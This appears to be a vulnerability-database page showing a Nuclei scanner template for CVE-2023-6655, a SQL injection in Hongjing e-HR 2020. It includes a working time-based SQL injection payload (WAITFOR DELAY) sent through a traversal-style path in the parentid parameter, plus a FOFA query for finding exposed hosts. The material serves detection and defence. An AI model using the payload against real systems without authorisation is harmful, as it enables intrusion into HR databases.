Hongjing e-HR 2020 - SQL Injection

CVE-2023-6655
Verified

Description

A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.

Severity

High

CVSS Score

7.3

Exploit Probability

4%

Affected Product

e-hr

Published Date

October 16, 2025

Template Author

pussycat0x

CVE-2023-6655.yaml
id: CVE-2023-6655

info:
  name: Hongjing e-HR 2020 - SQL Injection
  author: pussycat0x
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6655
    - https://github.com/Gent5698/vulnerability/blob/main/%E5%AE%8F%E6%99%AF/CVE-2023-6655/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2023-6655
    cwe-id: CWE-89
    epss-score: 0.03738
    epss-percentile: 0.87499
    cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: hrp2000
    product: e-hr
    fofa-query: title="人力资源信息管理系统"
  tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '/hcm/themes/')"
        condition: and
        internal: true

  - raw:
      - |
        GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target= HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate

    matchers:
      - type: dsl
        dsl:
          - "duration >= 6"
# digest: 4a0a00473045022100b5d5b09152d852e73b5aef79f42e14bd9c12a44678a52df451afea6a193f8b6102200a320afa6aa384d99c76f93ad0005656e2f5f351eb0ef2d16c84c43e6b73b5f6:922c64590222798bb761d5b6d8e72950
7.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2023-6655
CWE ID:
cwe-89